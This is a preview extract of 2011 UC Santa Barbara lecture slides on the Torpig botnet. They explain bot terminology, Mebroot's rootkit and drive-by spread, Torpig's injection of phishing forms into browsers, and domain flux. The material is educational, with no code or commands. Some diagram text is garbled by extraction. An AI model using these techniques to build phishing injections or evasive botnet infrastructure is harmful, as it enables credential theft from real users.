torpig - Botnet Terminology How to Steal a Botnet and What...

Info iconThis preview shows pages 1–3. Sign up to view the full content.

View Full Document Right Arrow Icon
How to Steal a Botnet and What Can Happen When You Do Security Group Department of Computer Science University of California, Santa Barbara kemm@cs.ucsb.edu Torpig Takeover CS177 2011 Richard A. Kemmerer UC Santa Barbara 2 Botnet Terminology • Bot – an application that performs some action or set of actions on behalf of a remote controller – installed on a victim machine (zombie) – modular (plug in your functionality/exploit/payload) • Botnet – network of infected machines controlled by a malicious entity • Control channel – required to send commands to bots and obtain results and status messages – usually via IRC, HTTP, HTTPs, or Peer-to-Peer • Bot Herder – aka botmaster or controller – owns control channel, sends commands to botnet army – motivations are usually power or money UC Santa Barbara 3 Torpig • Trojan horse – distributed via the Mebroot “malware platform” – injects itself into 29 different applications as DLL – steals sensitive information (passwords, HTTP POST data) – HTTP injection for phishing – uses domain flux • Mebroot – spreads via drive-by downloads – sophisticated rootkit (overwrites master boot record) UC Santa Barbara 4 Innocent victim “Hacked” web servers Injection server “Drive-By Download” server Torpig Torpig Torpig: Behind the scenes : Behind the scenes : Behind the scenes C o m a n d s + to rp ig STOLENDATA M eb roo t do w nlo ad UC Santa Barbara 5 Torpig HTML Injection • Domains of interest (~300) stored in configuration file • When domain of interest visited – Torpig issues request to injection server – server specifies a trigger page on target domain and a URL on injection server to be visited when user visits trigger page • When user visits the trigger page – Torpig requests injection URL from injection server – Torpig injects the returned content into the user’s browser • Content is usually html phishing form that asks for sensitive data – reproduces look and style of target web site UC Santa Barbara 6 Example Phishing Page
Background image of page 1

Info iconThis preview has intentionally blurred sections. Sign up to view the full version.

View Full DocumentRight Arrow Icon
UC Santa Barbara 7 Example Phishing Page UC Santa Barbara 8 Domain Flux • Taking down a single bot has little effect on botmaster – if you use a static IP address, people will block or remove host – if you use a DNS name, people will block or remove domain name • Domain flux – often, use local date (system time) as input – botmaster needs to register one of these domains – defenders must register all domains to take down botnet UC Santa Barbara
Background image of page 2
Image of page 3
This is the end of the preview. Sign up to access the rest of the document.

Page1 / 6

torpig - Botnet Terminology How to Steal a Botnet and What...

This preview shows document pages 1 - 3. Sign up to view the full document.

View Full Document Right Arrow Icon
Ask a homework question - tutors are online